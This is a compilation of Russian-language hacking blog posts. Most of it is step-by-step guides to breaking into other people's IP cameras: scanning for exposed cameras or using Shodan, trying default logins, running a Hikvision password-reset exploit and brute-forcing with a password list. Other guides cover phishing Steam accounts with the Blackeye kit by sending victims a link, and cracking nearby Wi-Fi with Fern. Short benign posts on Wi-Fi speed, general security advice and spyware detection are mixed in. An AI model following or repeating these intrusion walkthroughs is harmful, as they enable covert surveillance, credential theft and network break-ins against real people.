Настройте порты 80, 23, 8080, 8081 и 8082, которые чаще всего используются пользователями, устанавливающими IP-камеры.

https://i.gyazo.com/58dccb901812c3342ec49003111a5375.jpg

Настройте сборщики, которые будут отображать некоторую информацию об устройстве, полезную для определения производителя. Перейдите к инструментам и щелкните Fetchers, чтобы открыть окно конфигурации.

https://i.gyazo.com/f59b9982bad529fdc6ac0b4e3a5bc42e.jpg

Выберите сборщик веб-обнаружения с правой стороны и щелкните на стрелку, направленную налево.

https://i.gyazo.com/510d4e42dd246dd9cd83061918c08bda.jpg

Шаг 4 - Выберите диапазон IP-портов для сканирования. Чтобы взломать камеру видеонаблюдения, сначала необходимо найти ту, которая доступна в Интернете, поэтому вам нужно выбрать диапазон IP-адресов для сканирования с помощью сканера Angry IP. Смотрите изображение ниже:

https://i.gyazo.com/a9dc526ebaff7b20ae21fa41f781d1bc.jpg

Вы можете использовать диапазон IP-адресов вашей страны или поставщика услуг, в приведенном выше скрине мы использовали диапазон от xx.242.10.0 до xx.242.10.255.

Обратите внимание, что вы можете заполнить первую часть диапазона IP-адресов и выбрать, например, /24 или /16, чтобы программное обеспечение нашло для вас диапазон с 254 или 65,534 хостами соответственно.

Сканирование может быть выполнено для тысячи IP-адресов, поэтому довольно часто можно найти множество IP-камер, цифровых и сетевых видеорегистраторов, подключенных к Интернету. После того, как вы найдете камеру в Интернете, вам просто нужно щелкнуть правой кнопкой мыши и выбрать, чтобы открыть ее в браузере. Так же, как показано ниже:

https://i.gyazo.com/be77a70a381bebd61b49d672e748aab3.jpg

В нашем случае выбор пал на устройство Hikvision. Логин и пароль в руководстве по умолчанию: «admin/12345».

https://i.gyazo.com/ca9c5582524dc2eb066365c7e5a07ee0.jpg

Ниже показан фрагмент записи с камеры видеонаблюдения после входа в систему с учетными данными admin/12345.

https://i.gyazo.com/9076b09c5d881f0f22f17320718f002a.jpg

Вы поняли суть этого способа?

Чтобы взломать камеру видеонаблюдения, вам просто нужно использовать инструмент для сканирования, найти онлайн-камеру и попробовать применить пароль по умолчанию, который вы можете получить из руководства производителя.

На сегодня все. Надеемся, что эта информация была полезной для вас.

В следующей части вы узнаете о других способах взлома камер видеонаблюдения, научитесь защищать свои устройства от хакеров, а также углубитесь в суть самого процесса изнутри.

https://i.gyazo.com/6d0cc0b7cd39c7fe658d09d35e02528f.jpg

Вступить в наш чат

Операционная система является основой всех основ, отвечая за безупречную работу вашего компьютера. Нет плохих или хороших операционных систем, есть только конкретные цели, которые преследует пользователь при выборе ОС. Например, игроманам, несомненно, подойдёт Windows, поскольку на эту платформу выпускается наибольшее количество игр. Для проектирования и 3D моделирования как нельзя кстати пригодится Mac OS. Ну и, конечно же, когда речь заходит про программирование, взлом и тестирования на проникновение, то всем сразу на ум приходит Kali Linux. А что насчёт Ubuntu? В чем разница? Сегодня мы подробно сравним эти две ОС и определимся с целями использования.

Поехали!

https://i.gyazo.com/8b6adf896ad1ca5de10ee426b5e57962.jpg

Kali Linux

Kali Linux — это производный от Debian дистрибутив Linux, поддерживаемый Offensive Security. Его разработали Мати Ахарони и Девон Кернс. Kali Linux — это специально разработанная ОС для сетевых аналитиков или, проще говоря, для тех, кто работает в сфере кибербезопасности и анализа.

Многие думают, что Kali — только инструмент для взлома. Это один из самых больших мифов о Kali Linux. Kali Linux — это просто еще один дистрибутив Debian с набором сетевых инструментов и инструментов безопасности. Это настоящее оружие в умелых руках, которое не только пойдёт в атаку при необходимости, но и обеспечит вас защитой.

Ubuntu

Ubuntu — это операционная система на базе Linux, принадлежащая к семейству Linux Debian. Поскольку она основана на Linux, то находится в свободном доступе для использования и имеет открытый исходный код. Её разработала команда Canonical под руководством Марка Шаттлворта. Термин «ubuntu» происходит от африканского слова, означающего «человечность по отношению к другим».

Различия:

Kali Linux имеет более 600 предустановленных инструментов для тестирования на проникновение и сетевой безопасности, В Ubuntu же нет инструментов для взлома и тестирования на проникновение.

Ubuntu — хороший вариант для новичков в Linux. Kali Linux, в свою очередь, наиболее подходит уже для тех, кто разбирается в Linux и имеет опыт работы.

Если вы заинтересованы в тестировании на проникновение или кибербезопасности, то вам не обойтись без определенных инструментов для выполнения задач, которые уже предварительно установлены и настроены в Kali Linux. В Ubuntu же вам придётся дополнительно настраивать их.

Так как Ubuntu предназначена по-большей части для обычных пользователей, то ее интерфейс более прост и понятен в отличие от Kali Linux.

Ubuntu имеет более низкую скорость по сравнению с Kali Linux.

Что выбрать?

Kali Linux поставляется с более чем 600 предустановленными инструментами тестирования на проникновение, что делает его идеальной средой для для тестирования уязвимостей.

Но какой толк от всех этих приложений, если вы только начинаете свой путь в мире хакинга? Kali Linux, бесспорно, хорош, но только если вы знаете, как с ним работать. А если же 600 приложений, выполняющих почти одинаковые задачи приводят вас в ступор, то остановитесь и срочно скачайте Ubuntu.

Только после того как вы ознакомитесь с системой Linux, можно переходить к Kali. Эта ОС намного сложнее, чем вам кажется. Ubuntu более дружелюбен к начинающим пользователям Linux, а его последняя версия имеет привлекательный пользовательский интерфейс.

Заключение

Kali Linux должны использовать те, кто является профессиональными тестировщиками на проникновение, экспертами по кибербезопасности, хакерами или теми, кто знает, как с ней работать. Проще говоря, если вы знаете, как использовать Linux и его команды, систему и управление файлами, тогда вам подойдет Kali Linux. А если нет, то мы рекомендуем вам сначала начать с дистрибутива Ubuntu и освоить Linux, а после достаточной практики вы можете попробовать Kali Linux. Это не только сэкономит ваше время, но и облегчит использование.

На этом все. Удачи!

https://i.gyazo.com/0a81c7f684747a968d2d8b6a37da34b4.jpg

Вступить в наш чат

А вы знали, что на самом деле взломать веб-камеру проще простого? Не верите? Тогда читайте эту статью до конца, и вы сами в этом убедитесь.

Если вы еще не читали первую часть этой темы, то переходите прямо сейчас.

Как взломать IP-камеру видеонаблюдения

А мы продолжаем.

Взлом камеры с помощью shodan

Этот метод отличается своей простотой и доступностью, так как вам не нужно устанавливать программное обеспечение для сканирования сети, этот процесс уже сделан за вас, а вам просто нужно будет выполнить вход, используя учётные данные, заданные по умолчанию.

https://i.gyazo.com/551e3d6e7954e0e5e1c62d9731fa9f4e.jpg

Shodan — это интернет-сервис, который показывает интернет-устройства по всему миру, включая IP-камеры видеонаблюдения, цифровые видеорегистраторы и сетевые видеорегистраторы. Нужно просто ввести марку камеры или название производителя, и Shodan покажет вам много полезного, в том числе количество устройств по всему миру, их местоположение и даже открытые порты.

Взгляните сами на скриншот ниже и убедитесь, сколько информации доступно.

https://i.gyazo.com/abe0370f4a30adc06801f14a1557ff2a.jpg

Регистрация на сайте абсолютно бесплатная. Создав аккаунт, вы можете фильтровать свой запрос по камерам, странам и даже городам.

Shodan также показывает подробную информацию об IP-устройстве. Чтобы просмотреть сведения о камере, просто нажмите на детали, и откроется новое окно, которое покажет всю информацию о камере видеонаблюдения.

https://i.gyazo.com/a1d74b04cb3fc1cfe4d468384f6a9b29.jpg

Тут же вам будут доступны данные о местонахождении устройства и владельце.

https://i.gyazo.com/9a52c56e0ab04b4b535829b356a6dee4.jpg

Как мы уже знаем, каждая камера видеонаблюдения имеет свой IP-адрес в Интернете. Shodan же с лёгкостью продемонстрирует вам эту информацию, как показано ниже.

https://i.gyazo.com/1d012d6778bbc8c457c0c76653990293.jpg

После того, как мы выяснили всю вышеописанную информацию, нам нужно просто открыть браузер, чтобы ввести IP-адрес и порт устройства, а еще попытаться использовать логин и пароль по умолчанию, как описано ранее в предыдущей статье.

Для нашей камеры мы использовали следующее: XX.226.219.250:88

https://i.gyazo.com/642355b81af2f76bbdc164864cce04c0.jpg

Если вам повезло и пароль камеры никогда не менялся, то вы сможете войти в систему, введя заводские данные.

Это был простой метод, который мы не можем назвать 100 % взломом, однако, он может быть очень полезен для практики ваших хакерских умений. В следующей статье мы расскажем вам о более продвинутом способе, который используется опытными хакерами, но тем не менее он не отличается особой сложностью. Вы сможете взломать любую камеру наблюдения даже с самым сложным паролем. До новых встреч. Удачи!

https://i.gyazo.com/5cbb3538b1061929a8ac7e9df3787241.jpg

Вступить в наш чат

Вы хотите взломать камеру видеонаблюдения, но имя пользователя и пароль по умолчанию были изменены владельцем? Не переживайте, потому что у нас есть решение: вы можете использовать эксплойт. Когда у устройства возникают проблемы с безопасностью, хакеры могут создавать эксплойты для автоматизации процесса взлома. То же самое применимо и к камерам видеонаблюдения.

Если вы еще не ознакомились с предыдущими статьями, то советуем вам начать с них:

Как взломать IP-камеру видеонаблюдения

Как хакнуть камеру видеонаблюдения с помощью Shodan

Что такое эксплойт

Эксплойт - это специальная программа, использующая недостатки в системе безопасности устройства.

В этой статье мы расскажем вам о программном обеспечении, созданном для использования уязвимости в камерах видеонаблюдения. Для примера мы возьмём камеру Hikvision. Эксплойт камеры видеонаблюдения очень прост в использовании. Вам просто нужно запустить его на компьютере, чтобы взломать камеру видеонаблюдения, которая находится в Интернете или в вашей локальной сети.

В марте 2017 года в IP-камерах Hikvision была обнаружена уязвимость, которая предоставляла прямой доступ к информации об устройстве (модель, серийный номер, версия прошивки и т.д.). О проблеме сообщили в Hikvision 6 марта 2017 года, компания оперативно исследовала проблему и признала наличие сбоя. Пять дней спустя Hikvision выпустила обновление, но камеры, которые продолжили использовать старую прошивку, по-прежнему уязвимы и по сей день.

https://i.gyazo.com/be6ec756d6ff479fcf84c16622b991eb.jpg

Дисклеймер: Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несём ответственности за любые ваши действия.

Давайте подробнее поговорим об инструменте эксплойта Hikvision.

Перед началом вам нужно скачать утилиту Hikvision password reset. Как только вы это сделаете, откройте программу.

https://i.gyazo.com/c66a9a74cbeb58e295f394440607f196.jpg

Эксплойт может взломать камеру видеонаблюдения, получив внутренний список пользователей IP-камеры и установив новый пароль для одного из них по вашему выбору.

Чтобы использовать эксплойт, просто выполните следующие действия:

1. Введите IP-адрес и порт камеры;

2. Нажмите "получить список пользователей";

3. Выберите пользователя для смены пароля;

4. Введите новый пароль и подтвердите.

https://i.gyazo.com/4c502272ec7f772549c83a2e5f18dd30.jpg

После выполнения этих шагов вам просто нужно ввести IP-адрес и порт камеры в веб-браузере и войти в систему, используя только что созданные учетные данные. На этом все. Вы успешно взломали камеру. Надеемся, что данная статья была полезной.

В следующей статье мы расскажем вам о взломе камер видеонаблюдения с помощью атаки брутфорс и кода.

https://i.gyazo.com/a04dd45ce0dda123103d32cc3ffb02c2.jpg

Вступить в наш чат

Брутфорс-атака - это один из самых основных методов взлома, использующийся хакерами. Представьте, что вы могли бы методом подбора выявить нужный пароль. Но сколько же это займёт времени, если вы будете делать это вручную? Страшно представить. А что, если за вас это сделает специальная программа, способная проверять сотни и даже тысячи паролей в минуту? Шансы на успех вырастают, не так ли? Итак, в этой статье мы расскажем вам как работает этот метод взлома, и как он применим к камерам видеонаблюдения.

Brute-force атака — метод взлома, при котором хакер подбирает логин или пароль к учетной записи с помощью перебора всех возможных вариантов.

Данный метод уже очень давно является автоматизированным, так как существует огромное количество программ со встроенными словарями, данные которых регулярно обновляются. Одним из таких является *****, доступный в Kali Linux.

https://i.gyazo.com/a5b3c74798278bb14af3e4e711f05773.jpg

***** — это мощный инструмент для взлома паролей методом брутфорс. Сегодня мы покажем, как с помощью ***** взломать веб-камеру.

Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.

***** - это встроенный инструмент в Kali Linux, но если он у вас отсутствует, то скачайте его бесплатно. Вы можете использовать ***** для Linux или Windows.

Для начала вам просто нужно подготовить файл с паролями которые вы будете использовать, для этого введите команду:

***** -s 88 -l admin -P/root/desktop/pass.txt -e ns

Расшифровка:

-s 88 — номер порта на IP-камере;

-l admin — имя пользователя по умолчанию, которое будет использоваться;

(admin) -P/root/desktop/pass.txt — ваш файл со списком паролей;

-e-пустой пароль;

ns — логин и пустой пароль.

https://i.gyazo.com/92097306726736db2871bda030cd1154.jpg

После этого программа запускается и начинает подбирать разные слова, полученные из txt-файла, и продолжает делать это до тех пор, пока не будет найдено совпадение.

Это всего лишь вопрос времени, когда инструмент найдет правильный пароль.

Однако, современные камеры видеонаблюдения не допускают такой тип атаки, так как при обнаружении слишком большого количества попыток в систему, они блокируют доступ на некоторое время.

Заключение

Существуют разные способы взлома камеры видеонаблюдения, и все они требуют от хакера хотя бы некоторых базовых навыков: понимание, как устроены веб-камеры, какие способы взлома существуют, умение работать с Kali Linux и многое другое. Надеемся, что наша серия статей про взлом камер видеонаблюдений пролила свет на эти вопросы. Желаем вам удачи!

Другие статьи по теме:

Как взломать IP-камеру видеонаблюдения

Как хакнуть камеру видеонаблюдения с помощью Shodan

Взлом камеры видеонаблюдения с помощью эксплойта.

https://i.gyazo.com/faed166ed3cbbf53af36ee0f3bb8cbe3.jpg

Вступить в наш чат

Хотите ли вы хакнуть профиль пользователя на любом сайте? Если да, то эта статья для вас. Мы расскажем о самом простом способе, который осилит даже новичок. Все, что нам понадобится это элементарные знания о фишинге и социальной инженерии. А теперь обо всем по-порядку.

Прежде чем перейти к практической части, давайте освежим ваши знания о фишинге и о том, как он работает. Ну а если вы уже профи в этом деле, то переходите сразу к разделу «Установка Blackeye».

https://i.gyazo.com/d7245b9fc449ca54575bcaf2b82af078.jpg

Фишинг. Почему такое название

Фишинг — это метод взлома, при котором злоумышленник создаёт поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. Фишинг — один из старейших, но наиболее эффективных методов взлома. Если раньше хакеру требовалось вручную создавать фишинговую страницу, то теперь за вас это делает специальная программа, что делает процесс взлома ещё более доступным даже для новичка.

Слово "фишинг" в переводе на английский означает "рыбачить". Такое название появилось не с проста, так как вы подобной рыбаку делаете приманку, а затем бросаете ее в воду, в ожидании того, что рыба клюнет.

Готовы поймать рыбку?

Делаем приманку

Blackeye — это инструмент, который может сделать фишинг максимально простым. Фишинг и взлом аккаунтов являются противозаконными деяниями, поэтому дисклеймер.

Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.

Blackeye — это автоматизированный скрипт с готовыми фишинговыми страницами практически для всех популярных веб-сайтов, которые только можно придумать. У вас также есть возможность создавать собственные фишинговые страницы.

Для этой статьи мы сделаем поддельную страницу для взлома аккаунтов Steam. Мы покажем вам, как легко хакеры могут взламывать и компрометировать сайты.

Установка BlackEye

Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы загрузить и клонировать фишинговый инструмент blackeye на вашу машину kali:

git clone https://github.com/thelinuxchoice/blackeye

Шаг 2: Теперь, чтобы запустить blackeye, перейдите в папку blackeye с помощью команды:

cd blackeye

Чтобы запустить blackeye, запустите файл с именем blackeye.sh, набрав в терминале следующее:

bash blackeye.sh

Команда откроет терминал со всеми доступными шаблонами для фишинговых страниц, а также опцией для пользовательского шаблона фишинга, как показано на изображении ниже.

https://i.gyazo.com/a0a374ea692b3f027bc8a28c40965593.jpg

Как использовать инструмент blackeye

Ниже мы продемонстрируем, как взломать аккаунт Steam с помощью Blackeye. Пока мы используем шаблон steam, вы можете аналогичным образом использовать любые другие шаблоны из списка.

Итак, давайте начнем.

Шаг 1: Выберите нужный шаблон, введя номер на терминале.

Шаг 2: Инструменту Blackeye нужен ваш IP-адрес.

Введите IP-адрес, как показано ниже:

https://i.gyazo.com/6581b6a406b71762681db4ec49b60471.jpg

Шаг 3: Теперь поделитесь ссылкой с жертвой, используя социальную инженерию, чтобы поймать рыбку на крючок.

Скоро мы опубликуем подробное руководство по социальной инженерии, так что следите за обновлениями.

Теперь вам просто нужно дождаться, пока жертва войдет в систему по ссылке.

Шаг 3: Когда жертва нажимает на ссылку и вводит пароль и учетные данные, учетные данные перехватываются и передаются на наш компьютер с Kali Linux, как показано ниже. Также жертва перенаправляется на исходную страницу в Steam, думая, что неверно ввела логин-пароль.

Терминал kali отобразит учетные данные и всю информацию, как показано ниже:

https://i.gyazo.com/b516fe96c1e89c8e9025bbe387c5eda0.jpg

Вот так просто вы можете взломать любой веб-сайт с помощью инструмента Blackeye Phishing Tool в Kali Linux.

На это все. Удачи!

https://i.gyazo.com/3db039743a5a2a3e085cd2d0f0908c59.jpg

Вступить в наш чат

Замечали ли вы, как падает скорость вашего Wi-Fi? Вы можете оформить подписку на самый быстрый интернет-тариф, но ваша скорость по-прежнему будет оставлять желать лучшего. В чем же дело? Существует ряд немаловажных действий, которые необходимо выполнить, чтобы ваш интернет работал на высоких скоростях. В этой статье вы узнаете, как разогнать ваш Wi-Fi до максимума. Поехали!

Для начала давайте убедимся, что скорость вашего соединения, действительно, низкая. Для этого откройте сервис для проверки скорости интернета, например, speedtest.net.

https://i.gyazo.com/7ae65fee15643a5b7e853004c0e49ad6.png

Если ваши опасения подтвердились, то значит пора действовать!

Найдите идеального место для роутера

Хотите верьте, хотите нет, но расположение роутера в вашем доме напрямую влияет на скорость. Если роутер расположен рядом со стенами, шкафами или книжными полками, это может привести к нарушению беспроводного сигнала. Убедитесь, что он не находится в углу, под шкафом или в выдвижном ящике. Идеальное место - вдали от стены и от других устройств, использующих электромагнитные волны.

https://i.gyazo.com/9de684425fc7b84213d76073854c7b2c.jpg

Используйте Ethernet-кабель

Проводное соединение предпочтительнее беспроводного, поскольку оно обеспечивает более быстрое, стабильное и безопасное соединение и не зависит от других устройств. Для аппаратных устройств, которым нужен самый быстрый интернет — игровых консолей, ПК, стриминговых боксов и т. д. — кабель Ethernet — лучший вариант. Ваш роутер имеет множество портов Ethernet, поэтому вам не нужно беспокоиться о том, что их не хватит для нескольких устройств. Единственным ограничением является то, что кабели Ethernet ограничивают движение ваших устройств, поэтому советуем подключить только то устройство, которое требует самой высокой скорости.

https://i.gyazo.com/242823a3c902377241432dcbe46c83d9.jpg

Обновите свой роутер

Роутеры значительно различаются между собой по функциям, которые они могут выполнять. Если в доме есть мертвые зоны, то измените дальность вещания вашего Wi-Fi. Большой метраж дома подразумевает наличие удлинителей Wi-Fi, чтобы сигнал доходил даже до самых дальних уголков вашего дома. Вам также необходимо следить за тем, чтобы ваш роутер был правильно настроен, а программное обеспечение обновлялось ежедневно. Только тогда можно быть уверенным, что роутер справиться с возможными ошибками в программе, а скорость Интернета не упадёт.

https://i.gyazo.com/37568e19da15d3c8107cf6a69e69f61a.png

Установите надёжный пароль для Wi-Fi

Это может показаться слишком очевидным, но все же многие пренебрегают этим пунктом, устанавливая слишком простые пароли, которые легко поддаются брутфорс-атакам и иным хакерским взломам. Надёжный пароль поможет защититься от злоумышленников и сохранить скорость.

Подробнее о том, как легко взломать Wi-Fi читайте в нашей статье тут.

Отключите неиспользуемые устройства

Чем больше устройств, подключенных к вашему Wi-Fi-соединению, тем медленнее скорость. Обратите внимание, все ли устройства, подключённые к Wi-Fi вами используются. В противном случае отключите ненужные, так Интернет-скорость будет распределяться равномерно.

Заключение

Все пункты, упомянутые выше, обеспечат безопасное и быстрое подключение к Интернету на всех ваших устройствах. Если ни один из этих способов не сработал, что крайне маловероятно, то вам следует обратиться к своему интернет-провайдеру для дальнейших действий. На этом все. Удачи!

https://i.gyazo.com/35d7add40682def217145e9b5d9b9fc1.jpg

Вступить в наш чат

Кибербезопасность — это процесс предотвращения хакерских атак на системы, подключенные к Интернету, такие как компьютеры, сайты, мобильные устройства и данные. Методы предотвращения кибератак постоянно развиваются, как и сами угрозы. Вы должны знать о всех последних новшествах, чтобы уметь защищать свое личное пространство от угроз из вне.

https://i.gyazo.com/ab1ad0d5ec6e13a8c2e94e54c62f53a1.jpg

● Используйте брандмауэр и антивирусное программное обеспечение

Самый распространенный способ остановить злонамеренные атаки — использовать антивирус. Антивирусное программное обеспечение предотвращает проникновение троянов и других киберопасностей в вашу систему. Используйте антивирусное программное обеспечение от проверенных поставщиков и оставьте в своей системе только один антивирусный пакет, так ваши данные останутся под защитой.

Использование брандмауэра имеет решающее значение для защиты ваших данных от вредоносных угроз. Брандмауэр помогает остановить хакеров, вирусы и другие нежелательные действия в Интернете, регулируя трафик, которому разрешен доступ к вашему устройству.

● Создавайте надежные пароли

Скорее всего, вы и так уже знаете, что создание надежных паролей имеет решающее значение для безопасности в Интернете. Использование паролей жизненно важно для предотвращения доступа хакеров к вашим данным!

Откажитесь от простых слов и словосочетаний, не используйте типичные фразы (клички животных, дни рождения и т.д.) Вместо этого выберите что-то более сложное, состоящее минимум из восьми и максимум из 64 символов.

Минимум четыре символа, одна цифра, одна заглавная буква, одна строчная буква и символы &%#@ не допускаются в пароле.

Каждый раз используйте другой пароль.

Если вы забыли свой пароль, сбросьте его. Но так же меняйте его раз в год, а лучше каждые 2 месяца.

Не размещайте подсказки паролей везде, где их могут увидеть хакеры. Лучше держите пароль в голове.

● Используйте многофакторную или двухфакторную аутентификацию

Двухфакторная или многофакторная аутентификация — это услуга, которая повышает безопасность обычного метода онлайн-аутентификации - пароля. При использовании двухфакторной аутентификации вам потребуется ввести вторую форму идентификации, такую как код, полученный на мобильное устройство, отдельный пароль или даже отпечаток пальца. При многофакторной аутентификации вы должны выполнить более двух различных процедур аутентификации после предоставления своего логина и пароля.

Не рекомендуется устанавливать только SMS для двухфакторной аутентификации, поскольку вредоносное ПО может использоваться для атак на мобильные телефонные сети и компрометации данных.

● Регулярно обновляйте программное обеспечение

Атаки программ-вымогателей представляют серьезную угрозу как для обычных пользователей, так и для компаний. Одной из наиболее важных рекомендаций по кибербезопасности является исправление устаревшего программного обеспечения, включая операционные системы и приложения. Это помогает устранить важные бреши в системе безопасности, которые злоумышленники используют для получения доступа к вашим устройствам. Вот несколько простых советов, которые помогут вам:

Активируйте автоматические обновления системы вашего устройства.

Убедитесь, что ваш браузер автоматически устанавливает обновления безопасности.

Обновите плагины в своих браузерах, такие как Flash и Java.

● Обеспечьте безопасность вашей личной информации, позволяющей установить личность (PII)

Личная идентифицируемая информация (PII) — это любые данные, которые киберпреступник может использовать для обнаружения или идентификации конкретного человека. Имя, адрес, номер телефона, дата рождения, номер социального страхования, адрес, информация о местоположении и любые другие данные о цифровой или физической личности являются PII.

● Безопасность блокчейна

Одной из новейших технологий кибербезопасности, которая набирает популярность, является безопасность блокчейна. В основе работы технологии блокчейн лежит идентификация между участниками транзакции. Как и технология блокчейна, одноранговые сети являются основой кибербезопасности блокчейна.

Каждый участник блокчейна отвечает за подтверждение точности добавляемых данных. Блокчейны также являются нашим лучшим вариантом для защиты данных от компрометации, поскольку они создают практически неуязвимую сеть хакеров. Таким образом, объединение блокчейна и ИИ может обеспечить надежный метод проверки для предотвращения любых киберрисков.

● Утечка информации через приложения

Безопасность данных — огромная проблема, и любая организация, независимо от ее размера или сферы деятельности, может серьезно пострадать. Большинство утечек данных происходит через приложения, которые являются основными векторами. Что случиться, если ваши данные будут скомпрометированы? Утечка конфиденциальной информации происходит, когда данные непреднамеренно становятся доступными в Интернете. Это означает, что киберпреступник может быстро получить несанкционированный доступ к конфиденциальным данным.

Иногда обнаруживаются ошибки приложений. Большинство проблем вызвано недостатками и ошибками в дизайне программы, исходном коде или компонентах программы. Ошибки могут привести к сбою программного обеспечения, зависанию машины или иметь более тонкие последствия. Поэтому особое внимание стоит уделить приложениям и тем данным, которые вы разрешаете обрабатывать тому или иному приложению. Намного лучше свести к минимуму или вообще исключить какой-либо доступ для приложений, запрашивающих разрешение.

● Шифрование данных и предотвращение потери данных (DLP)

Потеря данных происходит, когда ценная или конфиденциальная информация на компьютере скомпрометирована из-за кражи, повреждения программы, хакеров, вирусов, человеческой ошибки или перебоев в подаче электроэнергии. Кроме того, причиной могут быть повреждения, механическая неисправность или иные дефекты. Часто бывает, что данные повреждены или случайно удалены, что приводит к «потере» данных. Например, падение жесткого диска ноутбука может быстро привести к утечке или повреждению данных из-за вирусов или вредоносного программного обеспечения.

Необходимо шифровать данные, чтобы это предотвратить. Шифрование данных — это метод обеспечения безопасности, при котором информация шифруется таким образом, что только пользователь и правильный ключ шифрования могут получить к ней доступ или расшифровать ее. Для шифрования данных доступно множество технологий, и AES, RSA и DES — лишь некоторые из них.

Заключение

Технологии регулярно и безостановочно развиваются, что в конечном итоге приводит к кибератакам. По мере того, как утечки данных, программы-вымогатели и взломы становятся все более частыми, происходит и усовершенствования в тенденциях киберзащиты. Здесь имеет смысл постоянно выявлять для себя и применять передовые технологии кибербезопасности для повышения безопасности и анонимности в Интернете.

https://i.gyazo.com/3f9109bc0ff46ebf0a8ebed8a9b88c3d.jpg

Вступить в наш чат

Fern Wifi Cracker — это инструмент для аудита безопасности беспроводной сети, написанный с использованием языка программирования Python. Эта программа способна взламывать и восстанавливать ключи WEP/WPA/WPS, а также запускать другие сетевые атаки на беспроводные или Ethernet-сети. Это один из лучших взломщиков Wi-Fi с графическим интерфейсом для Linux из доступных на сегодняшний день.

Итак, сейчас вы узнаете, как хакнуть Wi-Fi с помощью взломщика Wi-Fi Fern в Kali Linux.

https://i.gyazo.com/25eab8aa8535578c495b516ef17777ad.jpg

Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.

Fern предустановлен в Kali Linux. Он также автоматически обновляется вместе с Kali. Чтобы открыть взломщик Wi-Fi Fern, перейдите в «Приложения», затем в «Беспроводная атака», а затем нажмите взломщик Wi-Fi Fern, как показано на изображении ниже:

https://i.gyazo.com/5d0cb375a3c0869fd5f61656bfee6ff3.jpg

Шаг 1: Выберите интерфейс. Выпадающее меню покажет вам доступные.

Шаг 2: Поиск точек доступа. Нажмите «Поиск точек доступа». Вам нужно подождать, пока не появится статус «Активно». Теперь программа начнет сканирование сетей Wi-Fi.

Шаг 3: Доступные сети Wi-Fi. Все сети Wi-Fi поблизости будут автоматически отсортированы.

Шаг 4: Взлом. Сейчас мы попробуем взломать Wi-Fi-сети, основанные на безопасности WPA/WPA2. Как вы можете увидеть на скриншоте ниже, были обнаружены следующие сети:

https://i.gyazo.com/623d579b2957676b695ac445081dcab5.jpg

В зависимости от типа безопасности сети мы можем попробовать различные атаки.

Выберите сеть Wi-Fi, которую вы хотите взломать, и выполните пентест с помощью взломщика Wi-Fi Fern.

Шаг 5: Нажмите кнопку «Browse» внизу страницы.

https://i.gyazo.com/e52e5f47f91fe2b5e87d0a570361ca1d.jpg

Шаг 6: Нажмите на кнопку «Атака» и дождитесь начала.

Если вы читали наши предыдущие статьи о брутфорсе, то знаете, что это процесс проб и ошибок. В зависимости от сложности пароля и мощности ПК, время необходимое для взлома, будет варьироваться.

После успешной атаки вы сможете увидеть пароли в «Базе ключей» в любое время.

https://i.gyazo.com/11ae477def60e70a52ca826c2369c536.jpg

Поздравляем, вы узнали, как взломать любой пароль с помощью взломщика Wi-Fi Fern, выполнив эти простые шаги. Благодаря этому инструменту вы, вероятно, сможете взломать практически любую сеть Wi-Fi. На этом все. Удачи!

https://i.gyazo.com/9bbd14f263caaf4a019632cace71ea6d.jpg

Вступить в наш чат

На ряду с развитием кибербезопасности, совершенствуются и хакерские инструменты, в том числе шпионские приложения. Обнаружить их становится все труднее и труднее. Многие из них позиционируют себя как инструменты родительского контроля, тем не менее, они широко используются для взлома и других незаконных действий. А что если ваше устройство подверглось атаке, и прямо сейчас за вами наблюдают? Обнаружить шпионское ПО довольно просто, если знать где искать и на что обращать внимание. Инструменты для слежки представляют собой реальную угрозу конфиденциальности и безопасности. Поэтому мы решили сделать специальное руководство, чтобы вы знали, как действовать в подобной ситуации.

Как обнаружить шпионское ПО на вашем устройстве

https://i.gyazo.com/ecaf33bfdd42e54b46aa296bf8c563fb.jpg

Проверьте передачу сотовых данных

Как только хакер получит удаленный доступ к вашему телефону, устройство начнёт потреблять больше данных, что приведет к высокому использованию Интернета. Это легко проверить в настройках в разделе «сотовая связь». Первое на что стоит обратить внимание, нет ли чрезмерной передачи данных за последний период.

https://i.gyazo.com/75a8a0927a593822e7f738063ff59292.jpg

Странные уведомления и звуки

Если вы вдруг получили подозрительное уведомление от неизвестного приложения, которое вы не устанавливали, то можете быть уверены, что на вашем устройстве установлено какое-то шпионское приложение.

Помимо этого, всплывающая реклама в пуш уведомлениях и странные звуки — это все признаки шпионского или вредоносного ПО.

https://i.gyazo.com/97670d987568d79119aaccee8ef10d03.jpg

Перегрев телефона и быстрый расход батареи

Батарея разряжается намного быстрее, чем раньше? Ваш телефон нагревается, даже когда вы им не пользуетесь? Приложения открываются все медленнее? Причиной тому может быть шпионское приложение, работающее в фоновом режиме.

https://i.gyazo.com/4da1b2d1f58fd5024c7d8e594d228254.jpg

Странные сообщения

Если вы стали получать сообщения в закодированном формате из неизвестных источников, возможно, эти сообщения являются командами, контролирующими ваше устройство. Многие шпионские программы работают по такому принципу, поэтому, их наличие должно вас насторожить.

https://i.gyazo.com/33fdb909c3b884933309e0b4cda10364.jpg

Наличие скрытых папок

Используйте приложение для просмотра файлов и проверьте внутреннюю память. Включите опцию скрытых файлов. Шпионское приложение обычно создает файлы со словами «невидимка», «шпион» и «мобильный шпион» в именах, которые могут служить доказательствами.

Проверьте неизвестные приложения

Откройте раздел всех приложений на вашем Android, чтобы узнать, установлены ли на устройстве какие-либо неизвестные приложения. Если вы обнаружите там раннее неизвестное вам приложение, то можете быть уверены, что устройство было скомпрометировано, и вам необходимо удалить приложение как можно скорее.

https://i.gyazo.com/9b53bf1cc08761414dda3a98162373d3.jpg

При обнаружении 2 и более пунктов, можно со 100% вероятностью сделать заключение, что за вашим телефоном ведётся слежка. Выполнив, ниже описанные шаги, вы сможете устранить помеху и тщательно очистить ваше устройство от вредоносных программ.

Как очистить свое устройство от шпионского ПО

Устанавливайте приложения только из плеймаркета. Благодаря этому ваш телефон станет намного безопаснее и надежнее.

Установите антивирус. Это повысит безопасность вашего телефона, а также поможет обнаружить и устранить шпионское ПО.

Если вы используете iPhone, и ваше устройство было взломано, то обновите его до более новой версии или вовсе переустановите ios.

